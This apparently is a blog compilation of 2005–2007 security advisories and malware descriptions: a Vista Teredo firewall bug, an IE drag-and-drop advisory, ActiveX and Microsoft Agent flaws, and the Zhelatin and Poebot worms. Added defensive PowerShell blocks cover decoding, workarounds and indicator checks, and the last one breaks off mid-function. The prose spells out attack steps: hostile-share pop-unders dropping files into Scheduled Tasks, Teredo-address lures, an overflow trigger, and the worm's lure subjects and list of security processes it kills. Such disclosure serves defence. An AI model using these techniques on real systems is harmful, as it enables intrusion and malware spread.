Vista Windows Firewall Incorrectly Applies Filtering to Teredo Interface
Author: Jim Hoagland / Ollie Whitehouse
Release Date: 10-07-2007
Application: Windows Firewall (Vista version)
Platform: Windows Vista (RTM and RC2 builds known affected; XP, 2003 would not be affected)
Severity: Unintended remote exposure to services
Vendor status: Resolved in MS07-038
CVE Number: CVE-2007-3038
Reference: http://www.securityfocus.com/bid/24779
Overview: Windows Firewall for Windows Vista is the Microsoft-provided
firewall solution. It is installed and enabled out-of-the-box,
with most ports filtered.
Due to an implementation issue, the Windows Firewall does not
apply firewall rules correctly on the Teredo Interface. This
allows a level of remote access to TCP and UDP ports and services
that exceeds what Microsoft expected and what an administrator
would expect.
Details: Teredo is an IPv4 to IPv6 transition mechanism for IPv6-capable
hosts that are located behind an IPv4 NAT. It is installed and
enabled out-of-the-box on Windows Vista. It provides end-to-end
automatic tunneling through a NAT by tunneling IPv6 over IPv4 UDP
packets. Once a Teredo interface becomes set up (in Teredo
terminology: qualified), anyone on the Internet that knows the
Teredo address can send it packets and possibly establish
sessions. This capability persists until the Teredo interface
becomes de-qualified for some reason; while in general Teredo
works to keep a Teredo interface qualified, under some
circumstances Vista will shut down the interface after 60 minutes
of inactivity.
By design, Windows Firewall is supposed to block all access to
ports on the Teredo interface, except for cases where
access-through-Teredo is specifically requested (through the "Edge
Traversal" flag in the firewall rule being set). However, due to a
logic bug, it does not apply this restriction. Instead, any port
that is accessible on the local network is also accessible from
any host on the Internet over the Teredo interface, even if the
firewall rule specifies "remote address=local subnet".
The level of exposure depends on current firewall rule settings.
An out-of-the-box Vista installation with a network profile set
to "private" will expose the following port across the Teredo
interface:
* TCP port 5357 (Web Services for Devices)
An exposed service may reveal sensitive or useful information to
an attacker. In combination with a vulnerability in the service
it may also provide an avenue of attack. In addition, a service
that was designed to only be accessible in trusted circumstances
may simply not present an adequate security posture for general
Internet access.
It is not considered difficult for a remote user to cause the
Teredo interface to become qualified. Teredo can become qualified
simply because Vista or some application wants to use IPv6 for
whatever reason. The attacker would then just have to guess the
Teredo address or learn it by some means and they would be able to
access any open ports.
Teredo will also become qualified if the address of a peer
is a Teredo address (perhaps even if the peer has native
IPv6 Internet access). Thus an attacker can send a URL of the
form "http://[2001:0:...]/..." through e-mail, IM, HTTP, etc., and
if the URL is followed, the attacker will both know the Teredo
address of the victim and will have had the victim become
qualified. An HTTP redirect to such a URL would also work and may be
more stealthy. Reportedly, Vista will not return AAAA records
corresponding to Teredo addresses, so the attacker's Teredo address
would have to be listed by address and not by hostname.
Vendor Response: This has been patched in MS07-038.
Recommendation: Apply the patch contained in MS07-038.
In addition you should consider whether Teredo poses an acceptable
level of exposure to your network. If it provides too much
exposure (e.g., due to bypassing network-based security controls),
you should disable Teredo and block it on your network.
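The following PowerShell is an added example for this advisory, not code from Microsoft or from the advisory's authors. It decodes a Teredo address into the fields defined by RFC 4380 (so that Teredo peers can be recognised in logs or in a lure URL of the "2001:0:..." form), lists the firewall rules that carry the "Edge Traversal" flag, and wraps the built-in netsh commands that show or disable the Teredo interface. It assumes Windows PowerShell 3 or later and the netsh.exe that ships with Vista and later.

```powershell
# Added example (not Microsoft's code, nor the advisory authors'). Assumes
# Windows PowerShell 3 or later and the built-in netsh.exe; the address layout
# follows RFC 4380.

function ConvertFrom-TeredoAddress {
    # Decode a Teredo address into its server, flags and the client's mapped
    # (public NAT) IPv4 address and UDP port. Returns $null for non-Teredo input.
    param([Parameter(Mandatory = $true)][string]$Address)

    $ip = $null
    if (-not [System.Net.IPAddress]::TryParse($Address, [ref]$ip)) { return $null }
    if ($ip.AddressFamily -ne [System.Net.Sockets.AddressFamily]::InterNetworkV6) { return $null }

    $b = $ip.GetAddressBytes()                  # 16 bytes, network byte order
    # Teredo prefix is 2001:0000::/32 (the "2001:0:..." form in the advisory)
    if ($b[0] -ne 0x20 -or $b[1] -ne 0x01 -or $b[2] -ne 0 -or $b[3] -ne 0) { return $null }

    # Layout: prefix(32) | server IPv4(32) | flags(16) | port XOR 0xFFFF(16) | client IPv4 XOR 0xFFFFFFFF(32)
    $flags  = ([int]$b[8] -shl 8) -bor [int]$b[9]
    $port   = (([int]$b[10] -shl 8) -bor [int]$b[11]) -bxor 0xFFFF
    $client = foreach ($o in $b[12..15]) { [int]$o -bxor 0xFF }

    [pscustomobject]@{
        Address       = $Address
        TeredoServer  = ($b[4..7] -join '.')
        ConeFlag      = [bool]($flags -band 0x8000)   # bit 15 of the flags field
        MappedAddress = ($client -join '.')           # client's public (NAT) IPv4
        MappedPort    = $port                         # client's public UDP port
    }
}

function Get-TeredoState {
    # "netsh interface teredo show state" reports whether the interface is qualified.
    if (-not (Get-Command netsh.exe -ErrorAction SilentlyContinue)) { return $null }
    return (netsh interface teredo show state)
}

function Get-EdgeTraversalRules {
    # Names of firewall rules whose "Edge traversal" is Yes: the only rules that
    # are meant to be reachable over Teredo once MS07-038 is applied.
    if (-not (Get-Command netsh.exe -ErrorAction SilentlyContinue)) { return @() }
    $rules = @()
    $current = $null
    foreach ($line in (netsh advfirewall firewall show rule name=all)) {
        if ($line -match '^Rule Name:\s*(.+)$') { $current = $Matches[1].Trim() }
        elseif ($line -match '^Edge traversal:\s*Yes' -and $current) { $rules += $current }
    }
    return $rules
}

function Disable-Teredo {
    # The advisory's own recommendation for networks where the exposure is unacceptable.
    netsh interface teredo set state disabled
}

# Decode the sample address given in RFC 4380 (constructed input, not from the advisory).
ConvertFrom-TeredoAddress -Address '2001:0:4136:e378:8000:63bf:3fff:fdd2' | Format-List
```

Decoding the RFC 4380 sample address yields Teredo server 65.54.227.120, the cone flag set, and a mapped client address of 192.0.2.45 on UDP port 40000. Comparing the output of Get-EdgeTraversalRules with what is actually reachable over a host's Teredo address is a direct check for the behaviour this advisory describes. On the network side, the Teredo client-to-server exchange uses UDP port 3544 at the server (RFC 4380), so blocking outbound UDP/3544 at the perimeter prevents interfaces from qualifying in the first place.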
Labels: Bug, Firewall, Microsoft
[Full-disclosure] Advisory: Internet Explorer Drag and Drop Redeux [CVE-2005-3240] (fwd)
From: Matthew Murphy (mattmurphy AT kc.rr.com)
Date: Mon Feb 13 2006 - 18:46:38 CST
-----BEGIN PGP SIGNED MESSAGE-----
Hash: RIPEMD160
My apologies to those who are receiving this late or are otherwise
inconvenienced by the staggered release. I had unexpected, last-minute
travel issues that interfered somewhat with today's release.
Of note since the initial drafting of the advisory is that Microsoft has
released a blog post on the MSRC blog about the vulnerability report,
which can be read here:
http://blogs.technet.com/msrc/archive/2006/02/13/419439.aspx
The technical/strategic points about the exploit that are raised in the
post are indeed accurate (though it references MS05-014, when I believe
the correct reference is MS05-008/MS05-013). The exploit has a greater
dependence on timing than previous, related attacks. As such,
Microsoft's decision not to include this issue in a standalone patch is
seemingly justified at this point. However, the point of disagreement
with Microsoft remains the choice of release *timeline*.
I released the information about this issue to a trusted colleague (Gadi
Evron) for publication today, after what I felt was a reasonable time,
in light of my difficulties obtaining internet access.
Though there are disagreements between myself and Microsoft about the
nature of this vulnerability, I would like to thank Brian Schafer of the
MSRC for adhering to a high level of professionalism and technical
accuracy in that post and for continuing to work with me once it was
made clear that the issue would imminently become public.
Also of note is that there was a typo in the information I provided
originally to SecuriTeam. The proper candidate is CVE-2005-3240, not
*3840* as was originally reported by me. SecurityFocus has also
informed me that my original BID reservation was a casualty of a data
migration and that the proper BID associated with this vulnerability is
now BID 16352, which is public in full detail as of this writing.
There have also been some incorrect reports made to SecuriTeam that this
issue does not affect Windows XP Service Pack 2. These reports are not
correct -- my testing during this investigation was done exclusively on
current installations of Windows 2000 and Windows XP. These systems had
all service packs applied and all updates installed when tests were
performed.
Thanks to Gadi Evron for doing some of my bidding today and taking some
of the heat for my fat-fingers.
The final advisory, corrected with the now-accurate references is
attached with an armored-format PGP signature inline.
- --
"Social Darwinism: Try to make something idiot-proof,
nature will provide you with a better idiot."
-- Michael Holstein
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (MingW32)
Comment: http://pgp.mit.edu:11371/pks/lookup?op=get&search=0xB5444D38
iD8DBQFD8Shufp4vUrVETTgRA/hpAJ9DobMIa4EH8otBMNlzIPK6RrMGUgCfcrrj
ZI9G00rer59rLkwI5uH0KGQ=
=DQ2a
-----END PGP SIGNATURE-----
Microsoft Internet Explorer Drag-and-Drop Redeux
I. SYNOPSIS
Affected Systems:
* Microsoft Internet Explorer 5.01
* Microsoft Internet Explorer 5.5
* Microsoft Internet Explorer 6.0
- Windows 98
- Windows 98 Second Edition
- Windows Millennium Edition
- Windows 2000
- Windows XP
- Windows Server 2003
Risk: Medium
Impact: Potential remote code execution with some user interaction
Status: Uncoordinated Release
Author: Matthew Murphy (mattmurphy AT kc.rr.com)
II. VULNERABILITY OVERVIEW
Microsoft Internet Explorer suffers from a vulnerability in its handling of certain drag-and-drop events. As a result, it is possible for a malicious web site to predict and exploit the timing of a drag-and-drop operation such that any drag operation (including using scroll-bars) could potentially lead to the installation of arbitrary files in sensitive locations that may enable further system compromise.
III. TECHNICAL DESCRIPTION
As a result of recent updates to its drag-and-drop functionality, Internet Explorer now imposes a rigid set of restrictions on most drag-and-drop sources:
* Input to the browser from other applications is not permitted.
* Dragging an object from inside a frame is not permitted.
* Dragging an HTML element from a top-level window will produce a security warning.
However, certain objects not derived from an HTML document (specifically, file objects within a folder view) remain draggable. This gives rise to a potential race condition in the handling of user input. If an attacker can persuade a user to drag any object within the top-level window that his/her site is contained in, malicious script can redirect these inputs to other top-level windows, potentially resulting in an unintended consequence such as file installation.
Proof-of-concept code has been developed that utilizes a pop-under window pointing to a malicious file share. This window can be created using window.open() or other stealthier methods that are known to evade Internet Explorer's built-in pop-up blocking. Focus is then returned to the opening window, where the user is encouraged to drag an object (image, link, etc.) in a seemingly "safe" fashion.
Immediately prior to this object being dragged, a mouseOver event is triggered that enables the attacker to (with a varying degree of success) predict the imminent drag attempt. The pop-under can then be returned to focus by way of a window.blur() executed in the current window. If the timing of the transition is accurate to a margin of error within a user's reaction time threshold, the user will unwittingly initiate a drag of a file from the pop-under instead of the object originally used as a lure by the attacker.
As soon as it transfers focus, the window with the original interactive content may set a timer (via window.setTimeout()) that returns focus to the window with a simple window.focus() call. After a split-second delay, focus is returned to the interactive window. At this point, on-demand alteration of CSS attributes can be used to display previously-hidden objects (such as inline frames). These objects serve as "drop target" windows and will initiate the copying of the file dropped from the (presumably malicious) pop-under window.
While Internet Explorer blocks hiding or resizing of certain "suspect" objects (IFRAMEs, for instance), so-called container objects (DIV, SPAN, etc.) suffer no such restrictions, even when they contain one of the objects in the former category. The proof-of-concept code as developed simply stores a full-screen inline frame in a container initially marked with the "hidden" visibility style.
The pop-under window, in this instance, would be a folder on a malicious server. This could be accessed via SMB (\\HOSTILESERVER\SHARE), FTP (ftp://hostileserver/somedirectory) or even HTTP (web folders) using certain link behaviors in combination with the click() method of a hyperlink object. In the third case, the pop-under would be targeted to an HTML document initially, which would then open the web folder containing hostile content.
The path to the drop target (the hidden frame in the original window) requires a little more creativity. Particularly in Windows XP Service Pack 2, Microsoft has done a fairly good job of locking down access to local resources. The most interesting vector for the purposes of this attack is via the network redirector. By using the IP address or machine name of the local system (typically obtainable via any number of means), such as:
\\MACHINENAME\share
It becomes possible to access resources offered by the network redirector on the local system. Of most interest is the "Scheduled Tasks" folder:
\\MACHINENAME\Scheduled Tasks
Items dropped into this folder execute automatically at a system-determined time (3 AM local time in tests on Windows XP Professional Service Pack 2) each day as the user dropping the file. Also of interest are common shares such as the administrative shares (C$, D$, etc.) and typical share names like "SharedDocs" on Windows XP. In most cases, this is at least a partial functional equivalent to local file system access and is not subject to zone restrictions, even on Windows XP Service Pack 2.
IV. IMPACT
A malicious web site, with a minimum of social engineering, may be able to compromise user systems by triggering an unintended installation of malicious software. Typical defense-in-depth measures may mitigate this issue. For those who run Internet Explorer with administrative privileges, the impact of any successful exploitation is complete control of the affected system. A malicious web site could install software that would add or delete privileged user accounts, alter, destroy or disclose the content of personal or otherwise sensitive files, record personal information or any number of other activities.
Users who do not browse with such high levels of privilege would be at a significantly reduced risk from exploitation of this vulnerability. In the case of a user with limited privileges, this vulnerability could only be exploited by an attacker to install software that executes with the privileges of that user.
V. WORKAROUNDS
The following workarounds are believed at the time of this writing to be effective against the exploitation of this vulnerability in some form:
1. Set a Kill Bit on the Shell.Explorer Control
-----------------------------------------------
Setting a kill bit on this control will prevent Internet Explorer from displaying the rich folder view interface that gives rise to this attack. For more information about setting kill bits, please see Microsoft Knowledge Base Article 240797:
http://support.microsoft.com/kb/240797
The CLSID of this component as deployed on Windows XP is:
{8856F961-340A-11D0-A96B-00C04FD705A2}
Tools to automate the process of setting this kill bit have been provided at:
http://student.missouristate.edu/m/matthew007/tools/shellkill.zip
PGP signature: http://student.missouristate.edu/m/matthew007/tools/shellkill.zip.asc
Included in this archive are an Administrative Template (.adm) and a VBScript file (.vbs) which implement this setting. The Administrative Template also allows an administrator to work around a specific case of functionality loss caused by the implementation of this workaround. Instructions on using both files are contained within the readme file in the archive.
IMPACT: This workaround will cause Internet Explorer to no longer render folder views for local directories, network file shares, FTP directories and web folders by default. The ability to browse FTP directories in Internet Explorer can be restored by clearing the "Enable Folder View for FTP Sites" option in Internet Explorer's "Advanced" options. However, this countermeasure is known to expose another security vulnerability that does not appear to have been fixed as of this writing:
http://lists.grok.org.uk/pipermail/full-disclosure/2003-June/005321.html
For ordinary browsing purposes, the Windows Explorer tool is unaffected by this change. This defensive measure has been successfully implemented in at least one commercial software product and tested on a significant scale prior to the release of this advisory. Therefore, it is the belief of the author that potential loss of functionality *should* be minimal. As with all measures, you are encouraged to test the impact of this workaround prior to making any decision about deployment.
2. Prevent Automatic Navigation to Local Intranet Zone (Windows XP SP2, Windows Server 2003 SP1)
------------------------------------------------------------------------------------------------
This workaround will prevent internet content in Internet Explorer from automatically navigating to URLs within the Local Intranet Zone. This effectively prevents the introduction of malicious code to the local system via the network redirector. To implement this workaround, follow these steps:
1. In Internet Explorer's Tools menu, choose "Internet Options..."
2. Select the "Security" tab and choose "Local Intranet"
3. Click the "Custom Level" button
4. Set the "Web sites in less privileged content zone can navigate into this zone" setting to "Disable" or "Prompt".
5. Click OK to close any dialogs and optionally, close Internet Explorer.
IMPACT: This workaround will block or prompt before allowing any navigation to LAN resources from the Internet Zone. Direct access to LAN resources continues to function normally. As a result of this workaround, attempts to access local intranet content (for instance, web applications on corporate intranets) from web sites outside of the LAN will fail or produce prompts, depending upon the chosen setting.
3. Disable Active Scripting
---------------------------
This workaround will prevent internet content from executing script that could potentially cause the exploitation of this vulnerability. To implement this workaround, follow these steps:
1. In Internet Explorer's Tools menu, choose "Internet Options..."
2. Select the "Security" tab and choose "Internet"
3. Click the "Custom Level" button
4. Set the "Active scripting" option to "Prompt" or "Disable".
IMPACT: This workaround will block or prompt before allowing web sites to execute any script statement. Scripting in more-privileged zones (Local Intranet, Trusted Sites) continues to function normally. Setting this option to "Prompt" may cause a significant increase in the number of security prompts received while browsing and may be ineffective in closing this vulnerability for users not capable of making an assessment of a web site's relative trustworthiness.
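The PowerShell below is an added example, not part of the advisory or of the shellkill.zip tools it links to. It audits and applies the three workarounds through the registry: the Shell.Explorer kill bit (the CLSID is the one quoted in workaround 1; the "Compatibility Flags" value and the 0x400 kill bit come from Microsoft KB240797), and the two zone settings from workarounds 2 and 3, using the per-zone value names documented in Microsoft KB182569 (2101 for "Web sites in less privileged web content zone can navigate into this zone", 1400 for "Active scripting", with 0 = Enable, 1 = Prompt, 3 = Disable). It assumes Windows PowerShell 3 or later, an elevated prompt for the HKLM kill bit, and per-user (HKCU) zone settings.

```powershell
# Added example (not part of the advisory or of the shellkill.zip tools): audit
# and apply the three workarounds through the registry. Assumes Windows
# PowerShell 3 or later, elevation for the HKLM kill bit, and per-user (HKCU)
# zone settings; value names and data follow Microsoft KB240797 and KB182569.

$ShellExplorerClsid = '{8856F961-340A-11D0-A96B-00C04FD705A2}'   # CLSID from the advisory
$KillBitKey = "HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\$ShellExplorerClsid"
$KillBit    = 0x400                                              # "Compatibility Flags" kill bit
$ZonesKey   = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones'

# Zone 1 = Local intranet, zone 3 = Internet.  Data: 0 = Enable, 1 = Prompt, 3 = Disable.
$ZoneWorkarounds = @(
    @{ Name = 'Navigate into Local intranet from lower zone'; Zone = 1; Value = '2101' }  # workaround 2
    @{ Name = 'Active scripting in Internet zone';             Zone = 3; Value = '1400' }  # workaround 3
)

function Get-KillBitFlags {
    (Get-ItemProperty -Path $KillBitKey -Name 'Compatibility Flags' -ErrorAction SilentlyContinue).'Compatibility Flags'
}

function Test-ShellExplorerKillBit {
    $flags = Get-KillBitFlags
    return [bool]($flags -band $KillBit)
}

function Set-ShellExplorerKillBit {
    # Preserves any other compatibility flags already set on the control.
    $flags = Get-KillBitFlags
    if ($null -eq $flags) { $flags = 0 }
    if (-not (Test-Path $KillBitKey)) { New-Item -Path $KillBitKey -Force | Out-Null }
    Set-ItemProperty -Path $KillBitKey -Name 'Compatibility Flags' -Value ($flags -bor $KillBit) -Type DWord
}

function Get-ZoneSetting {
    param([int]$Zone, [string]$Value)
    $key = Join-Path $ZonesKey $Zone
    (Get-ItemProperty -Path $key -Name $Value -ErrorAction SilentlyContinue).$Value
}

function Set-ZoneSetting {
    param([int]$Zone, [string]$Value, [ValidateSet(0, 1, 3)][int]$Data)
    $key = Join-Path $ZonesKey $Zone
    if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
    Set-ItemProperty -Path $key -Name $Value -Value $Data -Type DWord
}

function Get-WorkaroundStatus {
    # A zone workaround counts as applied when the setting is Prompt (1) or Disable (3).
    $status = [ordered]@{ 'Shell.Explorer kill bit' = (Test-ShellExplorerKillBit) }
    foreach ($w in $ZoneWorkarounds) {
        $data = Get-ZoneSetting -Zone $w.Zone -Value $w.Value
        $status[$w.Name] = ($data -eq 1 -or $data -eq 3)
    }
    return $status
}

# Usage from an elevated prompt:
#   Set-ShellExplorerKillBit
#   Set-ZoneSetting -Zone 1 -Value '2101' -Data 3     # workaround 2, "Disable" (1 = Prompt)
#   Set-ZoneSetting -Zone 3 -Value '1400' -Data 1     # workaround 3, "Prompt"  (3 = Disable)
#   Get-WorkaroundStatus
```

Get-WorkaroundStatus reads the same values the Internet Options dialog writes, so it can be used to verify a deployment made through the GUI steps above or through the advisory's Administrative Template. Where zone settings are enforced by Group Policy they live under HKLM instead of HKCU, and $ZonesKey would need to point there.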
VI. MITIGATION RECOMMENDATIONS
1. Limit Viewing to Trusted Web Sites
-------------------------------------
In some situations, browsing can be successfully limited to only trustworthy sites without significant loss of productivity. Users should be extremely cautious while browsing unknown or untrusted web sites, as such web sites are often able to introduce hostile code.
2. Run Exposed Applications With Reduced Privilege
--------------------------------------------------
Users who log on interactively without the privileges of powerful groups such as the "Administrators" or "Power Users" groups are at a much lower risk of damage from successful exploitation of software vulnerabilities in client applications. This mitigation step greatly reduces the likelihood of a successful malware installation if this vulnerability is exploited.
VII. VENDOR RESPONSE
Microsoft was informed of this vulnerability on August 3, 2005. Currently, the company has no plans to issue a security update to correct this vulnerability. Fixes for this issue are scheduled to be included in Service Pack 2 of Windows Server 2003 and Service Pack 3 of Windows XP. Of particular note is that Windows 2000 users will *NOT* receive an update to correct this vulnerability.
Microsoft's internal risk-assessment concluded that this issue was not sufficiently serious to be fixed in a security bulletin. This conclusion appears fundamentally inconsistent with the way related issues were handled by Microsoft. In particular, the drag-and-drop vulnerability patched by MS05-013 received an "Important" rating.
I disagree with the technical conclusion behind Microsoft's decision and I further find the timeframe of delivery and deployment for maintenance releases to be largely unsuitable for security fixes of any significant magnitude. I find the harm this decision could potentially inflict upon down-level users (most importantly, users of Windows 2000) to be unjustified by the technical concern Microsoft has raised to me. Microsoft also rejected a request that it consider the issue for inclusion in a later security update as a "Moderate" risk issue.
Due to Microsoft's noncommittal and generally unimpressive response to the issue, this advisory is being issued to inform users of this vulnerability such that defensive action may be taken as desired.
VIII. REFERENCES/STANDARDS
* CVE
The MITRE Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2005-3840 to this issue. Status information and related references for this candidate may be found at:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3840
* OSVDB
The Open Source Vulnerability Database (OSVDB) project has assigned OSVDB vulnerability ID #2707 to this issue. Information will be available shortly after the publication of this advisory at the following URL:
http://www.osvdb.org/displayvuln.php?osvdb_id=2707
* SecurityTracker
SecurityTracker has pre-assigned an alert number in its internal database to reference this issue. Information will be available shortly after the publication of this advisory at the following URL:
http://www.securitytracker.com/id?1015049
* SecurityFocus
SecurityFocus has pre-assigned BugTraq ID #15089 to reference this issue. Information will be available shortly after the publication of this advisory at the following URL:
http://www.securityfocus.com/bid/15089
IX. ACKNOWLEDGEMENTS
* The Administrative Template file supplied in the workaround ZIP was authored by Steven Platt.
X. CONTACT
The author may be contacted via e-mail at mattmurphy AT kc.rr.com
XI. LEGAL
This document is believed accurate based upon information available at the time it was written. However, the information offered is offered in an AS-IS condition, without warranty. By acting upon this information in any way you accept all responsibility for damage that may occur as a result.
This document may be reproduced in whole without limitation and in part provided that a full copy of the original document is readily accessible and the author of the document is duly acknowledged.
Labels: Advisory, http, Microsoft, Vulnerability
Secunia Advisory: SA22896
Release Date: 2007-04-10
Last Update: 2007-04-11
Critical: Highly critical
Impact: System access
Where: From remote
Solution Status: Vendor Patch
OS:
Microsoft Windows 2000 Advanced Server
Microsoft Windows 2000 Datacenter Server
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Server
Microsoft Windows Server 2003 Datacenter Edition
Microsoft Windows Server 2003 Enterprise Edition
Microsoft Windows Server 2003 Standard Edition
Microsoft Windows Server 2003 Web Edition
Microsoft Windows XP Home Edition
Microsoft Windows XP Professional
CVE reference: CVE-2007-1205
Description:
Secunia Research has discovered a vulnerability in Microsoft Windows, which can be exploited by malicious people to compromise a user's system.
The vulnerability is caused due to an error in Microsoft Agent (agentdpv.dll) when processing specially crafted URLs passed as arguments to certain methods.
Successful exploitation allows execution of arbitrary code when a user e.g. visits a malicious website with Internet Explorer.
Solution:
Apply patches.
Windows XP (requires SP2):
http://www.microsoft.com/downloads/details.aspx?FamilyId=e16ededa-6e8c-40d6-a3c0-d61362411acc
Windows XP Professional x64 Edition (optionally with SP2):
http://www.microsoft.com/downloads/details.aspx?FamilyId=23909036-898f-41af-a3de-4a899a15d25d
Credits: discovered by JJ Reyes and Carsten Eiram, Secunia Research.
Changelog:
2007-04-11: Added link to US-CERT.
Original Advisory:
MS07-020 (KB932168):
http://www.microsoft.com/technet/security/Bulletin/MS07-020.mspx
Secunia Research:
http://secunia.com/secunia_research/2006-74/
Other References:
US-CERT VU#728057:
http://www.kb.cert.org/vuls/id/728057
Labels: Advisory, Critical, Microsoft, Vulnerability
Name : Email-Worm:W32/Zhelatin.CQ
Alias: Email-Worm.Win32.Zhelatin.cq
Type: E-Mail Worm, Rootkit
Category: Malware
Platform: Microsoft Windows Win32
Date of Discovery: April 08, 2007
Radar Alert Level 2
Summary
The Zhelatin.CQ worm started to spread very late on April 8th, 2007. The worm spreads in e-mails with war-related subjects as an attachment named 'video.exe', 'movie.exe', 'click me.exe' and so on. The worm creates its own peer-to-peer network.
Detailed Description
After the worm's file is started by a user, it drops a randomly named file into the same folder where it was started from and runs it. This file installs a rootkit and p2p (peer-to-peer) component into the Windows System folder. The file name is wincom32.sys. The following startup key is created in the Registry for the dropped file:
[HKLM\System\ControlSet001\Services\wincom32]
@ = "%WinSysDir%\wincom32.sys"
The installed component has rootkit features: it hides its Registry keys and active process so that an anti-rootkit engine is needed to reveal them. In addition this component drops a text file named wincom32.ini into the Windows System folder. This file contains a list of clients for the worm's peer-to-peer network. The peer names and access ports are encoded. Here's an example of the file's contents:
[counter]
Counter=0
[peers]
003964D3640550573F800125725481EF=5326859A123900
004982069E5DB75721B54CFF33A26170=5955FC93123900
00A1836AE91D076BC265F9735204714F=451AAE831EBF00
The dropped file also has a blacklist area, but it's empty at the moment. The worm decodes the clients' addresses and access ports and connects itself to the peer-to-peer network. A significant number of UDP connections can be observed when the worm is trying to connect to its p2p network.
At the same time the worm's copy that stays in memory starts its spreading cycle. It creates a mutex named klllekkdkkd and scans files on local hard disks for victims' e-mail addresses. The worm ignores e-mail addresses if they contain any of the following substrings:
microsoft
.gov
.mil
Then the worm starts to spread in e-mails. It sends messages with the following subjects to all found e-mail addresses:
USA Declares War on Iran
USA Missle Strike: Iran War just have started
Missle Strike: The USA kills more then 20000 Iranian citizens
Missle Strike: The USA kills more then 1000 Iranian citizens
Missle Strike: The USA kills more then 10000 Iranian citizens
Israel Just Have Started World War III
USA Just Have Started World War III
Iran Just Have Started World War III
As you can see, the subjects are war-related, which makes for an effective social engineering trick. The worm always attaches itself to the e-mails that it sends out. The attachment names can be any of the following:
More.exe
Read More.exe
Click Here.exe
Click Me.exe
Read Me.exe
Movie.exe
News.exe
Video.exe
When a recipient of such e-mail opens the attachment, his/her computer becomes infected and the worm continues its spreading cycle.
The worm has a payload. It kills processes if they have the following substrings in their names:
mcafee
taskmgr
hijack
f-pro
lockdown
msconfig
firewall
blackice
avg
vsmon
zonea
spybot
nod32
reged
rav
nav
avp
troja
viru
anti
Labels: Email, Microsoft, Worm
Yahoo! Messenger AudioConf ActiveX Control Buffer Overflow
Secunia Advisory: SA24742
Release Date: 2007-04-04
Critical: Highly critical
Impact: System access
Where: From remote
Solution Status: Vendor Patch
Software: Yahoo! Messenger 5.x , Yahoo! Messenger 6.x , Yahoo! Messenger 7.x, Yahoo! Messenger 8.x
CVE reference: CVE-2007-1680
Description:
A vulnerability has been reported in Yahoo! Messenger, which can be exploited by malicious people to compromise a user's system.
The vulnerability is caused due to a boundary error within the AudioConf ActiveX control (yacscom.dll) component of Yahoo! Messenger. This can be exploited to cause a stack-based buffer overflow by setting the "socksHostname" and "hostName" properties to an overly large string and then calling the "createAndJoinConference()" method.
Successful exploitation allows execution of arbitrary code when a user visits a malicious web site.
The vulnerability is reported in version 8.x. Other versions may also be affected.
Solution: Update to the latest version.
http://messenger.yahoo.com
Labels: Critical, Microsoft, Vulnerability
Infostealer.Banker.C
Risk Level 1: Very Low
SUMMARY
Discovered: April 2, 2007
Updated: April 2, 2007 9:02:00 AM
Type: Trojan
Systems Affected: Windows 2000, Windows 95, Windows 98, Windows Me, Windows NT, Windows Server 2003, Windows XP
Infostealer.Banker.C is a Trojan horse that may steal sensitive information from the compromised computer.
Threat Assessment
Wild
Wild Level: Low
Number of Infections: 0 - 49
Number of Sites: 0 - 2
Geographical Distribution: Low
Threat Containment: Easy
Removal: Easy
Damage
Damage Level: Medium
Payload: May steal sensitive information from the compromised computer.
Distribution
Distribution Level: Low
Writeup By: Elia Florio
Labels: Microsoft, Trojan, Virus
W32/Poebot-KN
Type: Spyware Worm
How it spreads: Network shares
Affected operating systems: Windows
Side effects: Allows others to access the computer; Steals information; Downloads code from the internet; Installs itself in the Registry; Exploits system or software vulnerabilities
W32/Poebot-KN is a worm for the Windows platform.
W32/Poebot-KN spreads through network shares protected by weak passwords and by exploiting common vulnerabilities including:
LSASS (MS04-011)
SRVSVC (MS06-040)
RPC-DCOM (MS04-012)
WKS (MS03-049)
Dameware (CAN-2003-1030)
PNP (MS05-039)
W32/Poebot-KN runs continuously in the background, providing a backdoor server which allows a remote intruder to gain access and control over the computer via IRC channels.
When first run, W32/Poebot-KN copies itself to
\spooIsv.exe.
The following registry entry is created to run spooIsv.exe on startup:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Spooler SubSystem App
\spooIsv.exe
Labels: Microsoft, Virus, Worm
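The PowerShell below is an added example, not code from the F-Secure or Sophos write-ups of Zhelatin.CQ and Poebot-KN above. It turns the host artefacts those two descriptions list (the wincom32 service key and files, the klllekkdkkd mutex, the "Spooler SubSystem App" Run value) into a host check, flags the "spooIsv.exe" lookalike of the print spooler's spoolsv.exe, and matches mail subjects and attachment names against Zhelatin's lure lists for use in a mail filter. It assumes Windows PowerShell 3 or later on the host being examined; the indicator values are copied from the descriptions, and the function names, the list of legitimate system process names and the mutex-probe technique are this example's own.

```powershell
# Added example (not code from F-Secure's or Sophos's write-ups): a host check
# for the persistence artefacts and lures listed in the two descriptions above.
# Assumes Windows PowerShell 3 or later; indicator values are copied from the
# descriptions, everything else is this example's own.

$SystemDir = if ($env:SystemRoot) { Join-Path $env:SystemRoot 'System32' } else { 'C:\Windows\System32' }  # %WinSysDir%

$Indicators = @(
    @{ Family = 'Zhelatin.CQ'; Kind = 'RegistryKey'; Path = 'HKLM:\System\ControlSet001\Services\wincom32' }
    @{ Family = 'Zhelatin.CQ'; Kind = 'RegistryKey'; Path = 'HKLM:\System\CurrentControlSet\Services\wincom32' }
    @{ Family = 'Zhelatin.CQ'; Kind = 'File';        Path = (Join-Path $SystemDir 'wincom32.sys') }
    @{ Family = 'Zhelatin.CQ'; Kind = 'File';        Path = (Join-Path $SystemDir 'wincom32.ini') }
    @{ Family = 'Zhelatin.CQ'; Kind = 'Mutex';       Name = 'klllekkdkkd' }
    @{ Family = 'Poebot-KN';   Kind = 'RunValue';    Path = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'; Name = 'Spooler SubSystem App' }
)

function Test-NamedMutex {
    # Opening an existing named mutex succeeds, or is refused for lack of rights,
    # only if some process created it; a missing name throws instead.
    param([Parameter(Mandatory = $true)][string]$Name)
    foreach ($candidate in @($Name, "Global\$Name", "Local\$Name")) {
        try {
            $m = [System.Threading.Mutex]::OpenExisting($candidate)
            $m.Dispose()
            return $true
        } catch {
            $ex = $_.Exception
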